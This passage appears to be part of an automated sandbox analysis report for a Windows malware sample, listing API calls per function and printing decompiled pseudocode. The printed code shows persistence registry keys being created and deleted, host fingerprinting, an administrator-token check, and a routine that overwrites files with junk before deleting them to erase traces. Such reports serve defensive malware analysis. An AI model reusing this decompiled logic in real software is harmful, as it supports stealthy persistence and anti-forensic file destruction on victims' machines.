      • Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004047FB
      • Part of subcall function 004047AC: GetFileSize.KERNEL32(?,00000000), ref: 00404810
      • Part of subcall function 004047AC: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040483F
      • Part of subcall function 004047AC: CloseHandle.KERNEL32(?), ref: 00404849
      • Part of subcall function 00407304: RegOpenKeyExA.ADVAPI32(80000002,004021A4,00000000,000F003F,?), ref: 00407331
      • Part of subcall function 00407304: RegOpenKeyExA.ADVAPI32(80000001,004021A4,00000000,000F003F,?), ref: 00407352
      • Part of subcall function 0040471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 00404777
      • Part of subcall function 0040471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 00404786
      • Part of subcall function 0040471C: CloseHandle.KERNEL32(?), ref: 00404790
      • Part of subcall function 00404A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 00404A55
      • Part of subcall function 00408B98: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,000000FF), ref: 00408BB2
      • Part of subcall function 00408B98: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 00408BD6
      • Part of subcall function 00408B6C: CreateThread.KERNEL32(00000000,00000000,Function_00008AA4,00000000,00000000,?), ref: 00408B81
      • Part of subcall function 00408B6C: CloseHandle.KERNEL32(?), ref: 00408B8E
      • Part of subcall function 00404BA0: GetComputerNameA.KERNEL32(?,00000101), ref: 00404BC3
      • Part of subcall function 00404BA0: RegOpenKeyExA.ADVAPI32(80000002,00402174,00000000,00020119,?), ref: 00404C01
      • Part of subcall function 00404BA0: GetVolumeInformationA.KERNEL32(004021D0,00000000,00000000,?,?,?,00000000,00000000), ref: 00404D40
      • Part of subcall function 00405468: GetSystemTime.KERNEL32(?), ref: 00405472
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
      • Part of subcall function 00408064: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 0040808B
      • Part of subcall function 00408064: RegDeleteValueA.ADVAPI32(?,?), ref: 0040809D
    • Sleep.KERNEL32(000003E8), ref: 00408FC8
    • GetCursorPos.USER32(?), ref: 00409000
      • Part of subcall function 00407474: RegCreateKeyExA.ADVAPI32(80000002,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 0040750D
      • Part of subcall function 00407474: RegCreateKeyExA.ADVAPI32(80000001,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00407533
      • Part of subcall function 004038DC: RtlEnterCriticalSection.NTDLL(?), ref: 004038E3
      • Part of subcall function 004038EC: RtlLeaveCriticalSection.NTDLL(?), ref: 004038F3
      • Part of subcall function 00405640: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 00405664
      • Part of subcall function 00405640: FindFirstFileA.KERNEL32(?,00000080), ref: 00405697
      • Part of subcall function 00405640: FindNextFileA.KERNEL32(000000FF,00000080), ref: 00405825
      • Part of subcall function 00405640: FindClose.KERNEL32(000000FF), ref: 0040583D
      • Part of subcall function 004084A4: Sleep.KERNEL32(00004E20), ref: 00408519
      • Part of subcall function 004084A4: GetTickCount.KERNEL32 ref: 004086EB
      • Part of subcall function 004084A4: Sleep.KERNEL32(00003A98), ref: 00408706
      • Part of subcall function 004084A4: RtlExitUserThread.NTDLL(00000000), ref: 00408879
      • Part of subcall function 004084A4: RtlExitUserThread.NTDLL(00000000), ref: 004088B6
      • Part of subcall function 004084A4: Sleep.KERNEL32(000003E8), ref: 0040895F
    • RtlExitUserThread.NTDLL(00000000), ref: 00409069
      • Part of subcall function 004041CC: GetCurrentThread.KERNEL32 ref: 004041DE
      • Part of subcall function 004041CC: OpenThreadToken.ADVAPI32(00000000), ref: 004041E5
      • Part of subcall function 004041CC: GetLastError.KERNEL32 ref: 004041F4
      • Part of subcall function 004041CC: GetCurrentProcess.KERNEL32 ref: 00404207
      • Part of subcall function 004041CC: OpenProcessToken.ADVAPI32(00000000), ref: 0040420E
      • Part of subcall function 004041CC: GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00404241
      • Part of subcall function 004041CC: CloseHandle.KERNEL32(?), ref: 0040424E
      • Part of subcall function 004041CC: AllocateAndInitializeSid.ADVAPI32(0040A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404278
      • Part of subcall function 004041CC: EqualSid.ADVAPI32(?,?), ref: 004042A2
      • Part of subcall function 004041CC: FreeSid.ADVAPI32(?), ref: 004042BE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00413840, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 154windowstring
    APIs
    • IsWindow.USER32(?), ref: 00413896
    • SendMessageA.USER32(?,?,?,?), ref: 004138AE
    • GetMenuItemCount.USER32 ref: 0041392A
    • GetVersionExA.KERNEL32(?), ref: 0041396B
    • GetMenuItemInfoA.USER32(?,00000000,00000001,0000002C), ref: 0041399F
    • lstrlen.KERNEL32(?,?,00000000,00000001,0000002C), ref: 004139D2
    • SetMenuItemInfoA.USER32(?,00000000,00000001,0000002C), ref: 004139ED
    • GetMenuItemCount.USER32 ref: 00413A10
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00426368, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 148fileLIBRARYCODE
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,00442CAA,00000104,00000001,?,00000000), ref: 00426404
      • Part of subcall function 00425114: GetCurrentProcess.KERNEL32 ref: 0042512A
      • Part of subcall function 00425114: TerminateProcess.KERNEL32(00000000), ref: 00425131
    • _wcslen.LIBCMT ref: 00426433
    • _wcslen.LIBCMT ref: 00426440
      • Part of subcall function 0042E40B: LoadLibraryW.KERNEL32(USER32.DLL,00442C78,00000314,00000000), ref: 0042E446
      • Part of subcall function 0042E40B: GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 0042E462
      • Part of subcall function 0042E40B: RtlEncodePointer.NTDLL(00000000), ref: 0042E473
      • Part of subcall function 0042E40B: GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0042E480
      • Part of subcall function 0042E40B: RtlEncodePointer.NTDLL(00000000), ref: 0042E483
      • Part of subcall function 0042E40B: GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0042E490
      • Part of subcall function 0042E40B: RtlEncodePointer.NTDLL(00000000), ref: 0042E493
      • Part of subcall function 0042E40B: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 0042E4A0
      • Part of subcall function 0042E40B: RtlEncodePointer.NTDLL(00000000), ref: 0042E4A3
      • Part of subcall function 0042E40B: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0042E4B4
      • Part of subcall function 0042E40B: RtlEncodePointer.NTDLL(00000000), ref: 0042E4B7
      • Part of subcall function 0042E40B: RtlDecodePointer.NTDLL(0044361C), ref: 0042E4D9
      • Part of subcall function 0042E40B: RtlDecodePointer.NTDLL ref: 0042E4E3
      • Part of subcall function 0042E40B: RtlDecodePointer.NTDLL(?), ref: 0042E522
      • Part of subcall function 0042E40B: RtlDecodePointer.NTDLL(?), ref: 0042E53C
      • Part of subcall function 0042E40B: RtlDecodePointer.NTDLL(00442C78), ref: 0042E550
    • GetStdHandle.KERNEL32(000000F4,00000001,?,00000000), ref: 004264B6
    • _strlen.LIBCMT ref: 004264F3
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00426502
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00411630, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 123windowlibrary
    APIs
    • GetParent.USER32(?), ref: 00411640
    • SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00411656
    • GetVersionExA.KERNEL32(?), ref: 0041169F
    • LoadLibraryA.KERNEL32(comctl32.dll), ref: 004116D6
    • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 004116EF
    • FreeLibrary.KERNEL32(00000000), ref: 0041170A
    • SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 0041174F
    • PostMessageA.USER32(00000000,0000042B,00000000,00000000), ref: 00411797
    • PostMessageA.USER32(?,00000100,00000028,00000000), ref: 004117AA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004080C0, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100window
    C-Code - Quality: 90%
    			E004080C0(intOrPtr __eax) {
				intOrPtr _v8;
				char _v265;
				void* _t13;
				void* _t15;
				char* _t27;
				intOrPtr _t31;
				void* _t33;
				void* _t35;
				signed int _t37;
				signed int _t39;
				char* _t42;
				struct HWND__* _t48;
				intOrPtr _t50;
				char* _t60;
				char* _t62;
				void* _t63;

				_v8 = __eax;
				if( *0x40a038 != 0) {
					_t50 =  *0x40a038; // 0x0
					 *0x40b4f8(_t50);
				}
				 *0x40c24c = CreateEventA(0, 0xffffffff, 0, 0);
				 *0x40a29c = 0xffffffff;
				_t13 =  *0x40c24c; // 0x0
				WaitForSingleObject(_t13, 0xffffffff);
				_t15 =  *0x40c24c; // 0x0
				CloseHandle(_t15);
				E00401308( &_v265, 0x40b518);
				 *((char*)(_t63 + E004012DC(0x40b518) - 0x109)) = 0;
				E0040133C( &_v265, ".lnk");
				E0040471C( &_v265, 0, 0);
				E0040471C(0x40b518, 0x7530, 0xffffffff);
				if( *0x40a574 != 0) {
					_t48 =  *0x40a574; // 0x0
					SendMessageA(_t48, 0x10, 0, 0);
				}
				if( *0x40a034 == 0) {
					if(_v8 == 0) {
						_t27 =  *0x40a260; // 0x4021a4
						SHDeleteKeyA(0x80000001, _t27);
					} else {
						_t60 =  *0x40a260; // 0x4021a4
						E00408064(0x80000001, 0x40b752, _t60);
					}
					E00404A1C(0x80000001,  &_v265);
				} else {
					if(_v8 == 0) {
						_t42 =  *0x40a260; // 0x4021a4
						SHDeleteKeyA(0x80000002, _t42);
					} else {
						_t62 =  *0x40a260; // 0x4021a4
						E00408064(0x80000002, 0x40b752, _t62);
					}
					E00404A1C(0x80000002,  &_v265);
				}
				_t31 =  *0x40b510; // 0x0
				E00401828(_t31);
				_t33 =  *0x40a054; // 0x0
				ReleaseMutex(_t33);
				_t35 =  *0x40a054; // 0x0
				CloseHandle(_t35);
				_t37 =  *0x40a2a0; // 0x0
				asm("sbb eax, eax");
				_t39 =  ~( ~_t37);
				if(_t39 == 0) {
					ExitProcess(0);
				}
				return _t39;
			}



















    0x004080c9
    0x004080d3
    0x004080d5
    0x004080db
    0x004080db
    0x004080ef
    0x004080f4
    0x00408100
    0x00408106
    0x0040810c
    0x00408112
    0x00408123
    0x00408132
    0x00408146
    0x00408158
    0x0040816a
    0x00408176
    0x0040817e
    0x00408184
    0x00408184
    0x00408191
    0x004081d7
    0x004081f0
    0x004081fb
    0x004081d9
    0x004081de
    0x004081e9
    0x004081e9
    0x0040820c
    0x00408193
    0x00408197
    0x004081b0
    0x004081bb
    0x00408199
    0x0040819e
    0x004081a9
    0x004081a9
    0x004081cc
    0x004081cc
    0x00408211
    0x00408216
    0x0040821b
    0x00408221
    0x00408227
    0x0040822d
    0x00408233
    0x0040823a
    0x0040823c
    0x00408240
    0x00408244
    0x00408244
    0x0040824d

    APIs
    • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 004080DB
    • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 004080E9
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00408106
    • CloseHandle.KERNEL32(00000000), ref: 00408112
      • Part of subcall function 0040471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 00404777
      • Part of subcall function 0040471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 00404786
      • Part of subcall function 0040471C: CloseHandle.KERNEL32(?), ref: 00404790
    • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 00408184
    • SHDeleteKeyA.SHLWAPI(80000002,004021A4), ref: 004081BB
    • ExitProcess.KERNEL32 ref: 00408244
      • Part of subcall function 00408064: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 0040808B
      • Part of subcall function 00408064: RegDeleteValueA.ADVAPI32(?,?), ref: 0040809D
    • SHDeleteKeyA.SHLWAPI(80000001,004021A4), ref: 004081FB
      • Part of subcall function 00404A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 00404A55
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
    • ReleaseMutex.KERNEL32(00000000), ref: 00408221
    • CloseHandle.KERNEL32(00000000), ref: 0040822D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 0041F730, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 224window
    APIs
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 0041F7AB
      • Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960
    • MessageBoxA.USER32(?,Failed to create document,Error,00000030), ref: 0041F803
    • MessageBoxA.USER32(?,Failed to create document,Error,00000030), ref: 0041F83F
    • LoadCursorA.USER32(00000000,00007F02), ref: 0041F895
    • SetCursor.USER32(00000000), ref: 0041F8A0
    • SetCursor.USER32(?), ref: 0041F8CC
    • MessageBoxA.USER32(?,Failed to open file,Error,00000030), ref: 0041F8FE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00404608, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 88sleepfile
    C-Code - Quality: 96%
    			E00404608(intOrPtr* _a4) {
				int _v8;
				CHAR* _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				long _v32;
				char _v36;
				void _v548;
				signed int _t42;
				char _t58;

				_v8 = 0;
				_v16 =  *_a4;
				_v12 = _a4 + 4;
				while(1) {
					_t42 = E00403988(_v12);
					asm("sbb eax, eax");
					if( ~( ~_t42) == 0) {
						break;
					}
					_v20 = CreateFileA(_v12, 0xc0000000, 0, 0, 3, 0x20000080, 0);
					if(_v20 == 0xffffffff) {
						L8:
						_v8 = DeleteFileA(_v12);
						if(_v8 != 0 || _v16 == 0) {
							L13:
							E00401440(_a4);
							return _v8;
						} else {
							if(_v16 <= 0x64) {
								Sleep(_v16);
								_v16 = 0;
							} else {
								Sleep(0x64);
								_v16 = _v16 - 0x64;
							}
							continue;
						}
					}
					_v24 = GetFileSize(_v20, 0);
					_t58 = (_v24 >> 9) + 1;
					if(_t58 <= 0) {
						L7:
						FlushFileBuffers(_v20);
						CloseHandle(_v20);
						goto L8;
					}
					_v36 = _t58;
					_v28 = 1;
					do {
						WriteFile(_v20,  &_v548, 0x200,  &_v32, 0);
						_v28 = _v28 + 1;
						_t21 =  &_v36;
						 *_t21 = _v36 - 1;
					} while ( *_t21 != 0);
					goto L7;
				}
				_v8 = 0xffffffff;
				goto L13;
			}














    0x00404613
    0x0040461b
    0x00404624
    0x00404627
    0x0040462a
    0x00404631
    0x00404637
    0x00000000
    0x00000000
    0x00404661
    0x00404668
    0x004046c6
    0x004046d0
    0x004046d7
    0x0040470a
    0x0040470d
    0x00404718
    0x004046df
    0x004046e3
    0x004046fa
    0x00404702
    0x004046e5
    0x004046e7
    0x004046ed
    0x004046ed
    0x00000000
    0x004046e3
    0x004046d7
    0x00404676
    0x0040467f
    0x00404682
    0x004046b2
    0x004046b6
    0x004046c0
    0x00000000
    0x004046c0
    0x00404684
    0x00404687
    0x0040468e
    0x004046a4
    0x004046aa
    0x004046ad
    0x004046ad
    0x004046ad
    0x00000000
    0x0040468e
    0x00404639
    0x00000000

    APIs
      • Part of subcall function 00403988: FindFirstFileA.KERNEL32(?,?), ref: 004039A4
      • Part of subcall function 00403988: FindClose.KERNEL32(000000FF), ref: 004039BF
    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,20000080,00000000), ref: 0040465B
    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00404670
    • WriteFile.KERNEL32(000000FF,?,00000200,?,00000000), ref: 004046A4
    • FlushFileBuffers.KERNEL32(000000FF), ref: 004046B6
    • CloseHandle.KERNEL32(000000FF), ref: 004046C0
    • DeleteFileA.KERNEL32(?), ref: 004046CA
    • Sleep.KERNEL32(00000064), ref: 004046E7
    • Sleep.KERNEL32(00000064), ref: 004046FA
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00416D60, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 59library
    APIs
      • Part of subcall function 00416570: CallWindowProcA.USER32(?,?,?,?,?), ref: 0041658D
      • Part of subcall function 00416570: GetParent.USER32(?), ref: 004165A8
      • Part of subcall function 00416570: GetParent.USER32(00000000), ref: 004165AD
      • Part of subcall function 00416570: GetParent.USER32(00000000), ref: 004165B8
      • Part of subcall function 00416570: SendMessageA.USER32(?,0000041E,00000014,00000000), ref: 004165D9
      • Part of subcall function 00416570: SendMessageA.USER32(?,00000430,00000000,00000000), ref: 004165E6
      • Part of subcall function 00416570: RtlEnterCriticalSection.NTDLL(00442B64), ref: 004165ED
      • Part of subcall function 00416570: GetCurrentThreadId.KERNEL32 ref: 00416616
      • Part of subcall function 00416570: SetWindowsHookExA.USER32(00000003,Function_00005B20,00442B90,00000000), ref: 00416669
      • Part of subcall function 00416570: RtlLeaveCriticalSection.NTDLL(00442B64), ref: 0041669F
      • Part of subcall function 00416570: GetWindowLongA.USER32(00000000,000000EC), ref: 004166AB
    • LoadLibraryA.KERNEL32(uxtheme.dll), ref: 00416D92
    • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 00416DAF
    • GetProcAddress.KERNEL32(?,OpenThemeData), ref: 00416DC7
    • FreeLibrary.KERNEL32(?), ref: 00416DE7
    • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 00416E03
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00420F70, Relevance: 16.6, APIs: 11, Instructions: 125window
    APIs
    • LoadMenuA.USER32(00442B94), ref: 00420FA1
    • SendMessageA.USER32(?,00000229,00000000,?), ref: 00421001
    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00421011
      • Part of subcall function 00420A00: GetCurrentProcess.KERNEL32 ref: 00420A36
      • Part of subcall function 00420A00: FlushInstructionCache.KERNEL32(00000000), ref: 00420A3D
      • Part of subcall function 00420A00: SetLastError.KERNEL32(0000000E), ref: 00420A57
      • Part of subcall function 00420A00: CreateWindowExA.USER32(?,?,?,?,?,00000000,000000E9,?,?,?,00442B90,?), ref: 00420AD1
    • SendMessageA.USER32(?,00000225,00000000,00000000), ref: 0042105B
    • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00421064
    • GetParent.USER32(?), ref: 0042107A
    • SetFocus.USER32(00000000), ref: 00421081
    • IsWindowVisible.USER32(?), ref: 0042109B
    • GetFocus.USER32 ref: 004210A5
    • IsChild.USER32(00000000,00000000), ref: 004210AD
    • SetFocus.USER32(00000000), ref: 004210B8
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00416570, Relevance: 16.6, APIs: 11, Instructions: 122windowthread
    APIs
    • CallWindowProcA.USER32(?,?,?,?,?), ref: 0041658D
      • Part of subcall function 00415980: GetVersionExA.KERNEL32(?,00000090), ref: 004159B5
      • Part of subcall function 00415980: SystemParametersInfoA.USER32(00000029,00000158,?,00000000), ref: 004159FA
      • Part of subcall function 00415980: GetSystemMetrics.USER32(00000031), ref: 00415A10
      • Part of subcall function 00415980: GetSystemMetrics.USER32(00000032), ref: 00415A1A
      • Part of subcall function 00415980: GetClientRect.USER32 ref: 00415AB9
    • GetParent.USER32(?), ref: 004165A8
    • GetParent.USER32(00000000), ref: 004165AD
    • GetParent.USER32(00000000), ref: 004165B8
      • Part of subcall function 004124F0: GetCurrentProcess.KERNEL32 ref: 00412525
      • Part of subcall function 004124F0: FlushInstructionCache.KERNEL32(00000000), ref: 0041252C
      • Part of subcall function 004124F0: SetWindowLongA.USER32(?,000000FC,00000000), ref: 0041253E
    • SendMessageA.USER32(?,0000041E,00000014,00000000), ref: 004165D9
    • SendMessageA.USER32(?,00000430,00000000,00000000), ref: 004165E6
    • RtlEnterCriticalSection.NTDLL(00442B64), ref: 004165ED
    • GetCurrentThreadId.KERNEL32 ref: 00416616
      • Part of subcall function 00414220: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00414270
    • GetWindowLongA.USER32(00000000,000000EC), ref: 004166AB
      • Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960
    • SetWindowsHookExA.USER32(00000003,Function_00005B20,00442B90,00000000), ref: 00416669
    • RtlLeaveCriticalSection.NTDLL(00442B64), ref: 0041669F
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0042A946, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 92LIBRARYCODE
    APIs
    • __getptd.LIBCMT ref: 0042A95F
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
    • __getptd.LIBCMT ref: 0042A96D
      • Part of subcall function 00425CFE: RtlEncodePointer.NTDLL(00000000), ref: 00425D00
    • _CallSETranslator.LIBCMT ref: 0042A9A4
      • Part of subcall function 00423FC2: __getptd.LIBCMT ref: 0042404D
    • _GetRangeOfTrysToCheck.LIBCMT ref: 0042A9D2
      • Part of subcall function 0042A8D8: _UnwindNestedFrames.LIBCMT ref: 0042A902
      • Part of subcall function 0042AF11: RtlDecodePointer.NTDLL(0043CFE8), ref: 0042AF23
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004080BE, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80window
    C-Code - Quality: 90%
    			E004080BE(intOrPtr __eax) {
				intOrPtr _v8;
				char _v265;
				void* _t13;
				void* _t15;
				char* _t27;
				intOrPtr _t31;
				void* _t33;
				void* _t35;
				signed int _t37;
				signed int _t39;
				char* _t42;
				struct HWND__* _t48;
				intOrPtr _t50;
				char* _t60;
				char* _t62;
				void* _t64;
				void* _t66;

				_t64 = _t66;
				_v8 = __eax;
				if( *0x40a038 != 0) {
					_t50 =  *0x40a038; // 0x0
					 *0x40b4f8(_t50);
				}
				 *0x40c24c = CreateEventA(0, 0xffffffff, 0, 0);
				 *0x40a29c = 0xffffffff;
				_t13 =  *0x40c24c; // 0x0
				WaitForSingleObject(_t13, 0xffffffff);
				_t15 =  *0x40c24c; // 0x0
				CloseHandle(_t15);
				E00401308( &_v265, 0x40b518);
				 *((char*)(_t64 + E004012DC(0x40b518) - 0x109)) = 0;
				E0040133C( &_v265, ".lnk");
				E0040471C( &_v265, 0, 0);
				E0040471C(0x40b518, 0x7530, 0xffffffff);
				if( *0x40a574 != 0) {
					_t48 =  *0x40a574; // 0x0
					SendMessageA(_t48, 0x10, 0, 0);
				}
				if( *0x40a034 == 0) {
					if(_v8 == 0) {
						_t27 =  *0x40a260; // 0x4021a4
						SHDeleteKeyA(0x80000001, _t27);
					} else {
						_t60 =  *0x40a260; // 0x4021a4
						E00408064(0x80000001, 0x40b752, _t60);
					}
					E00404A1C(0x80000001,  &_v265);
				} else {
					if(_v8 == 0) {
						_t42 =  *0x40a260; // 0x4021a4
						SHDeleteKeyA(0x80000002, _t42);
					} else {
						_t62 =  *0x40a260; // 0x4021a4
						E00408064(0x80000002, 0x40b752, _t62);
					}
					E00404A1C(0x80000002,  &_v265);
				}
				_t31 =  *0x40b510; // 0x0
				E00401828(_t31);
				_t33 =  *0x40a054; // 0x0
				ReleaseMutex(_t33);
				_t35 =  *0x40a054; // 0x0
				CloseHandle(_t35);
				_t37 =  *0x40a2a0; // 0x0
				asm("sbb eax, eax");
				_t39 =  ~( ~_t37);
				if(_t39 == 0) {
					ExitProcess(0);
				}
				return _t39;
			}




















    0x004080c1
    0x004080c9
    0x004080d3
    0x004080d5
    0x004080db
    0x004080db
    0x004080ef
    0x004080f4
    0x00408100
    0x00408106
    0x0040810c
    0x00408112
    0x00408123
    0x00408132
    0x00408146
    0x00408158
    0x0040816a
    0x00408176
    0x0040817e
    0x00408184
    0x00408184
    0x00408191
    0x004081d7
    0x004081f0
    0x004081fb
    0x004081d9
    0x004081de
    0x004081e9
    0x004081e9
    0x0040820c
    0x00408193
    0x00408197
    0x004081b0
    0x004081bb
    0x00408199
    0x0040819e
    0x004081a9
    0x004081a9
    0x004081cc
    0x004081cc
    0x00408211
    0x00408216
    0x0040821b
    0x00408221
    0x00408227
    0x0040822d
    0x00408233
    0x0040823a
    0x0040823c
    0x00408240
    0x00408244
    0x00408244
    0x0040824d

    APIs
    • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 004080DB
    • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 004080E9
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00408106
    • CloseHandle.KERNEL32(00000000), ref: 00408112
      • Part of subcall function 0040471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 00404777
      • Part of subcall function 0040471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 00404786
      • Part of subcall function 0040471C: CloseHandle.KERNEL32(?), ref: 00404790
    • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 00408184
    • ExitProcess.KERNEL32 ref: 00408244
      • Part of subcall function 00408064: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 0040808B
      • Part of subcall function 00408064: RegDeleteValueA.ADVAPI32(?,?), ref: 0040809D
    • SHDeleteKeyA.SHLWAPI(80000002,004021A4), ref: 004081BB
    • SHDeleteKeyA.SHLWAPI(80000001,004021A4), ref: 004081FB
      • Part of subcall function 00404A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 00404A55
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
    • ReleaseMutex.KERNEL32(00000000), ref: 00408221
    • CloseHandle.KERNEL32(00000000), ref: 0040822D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
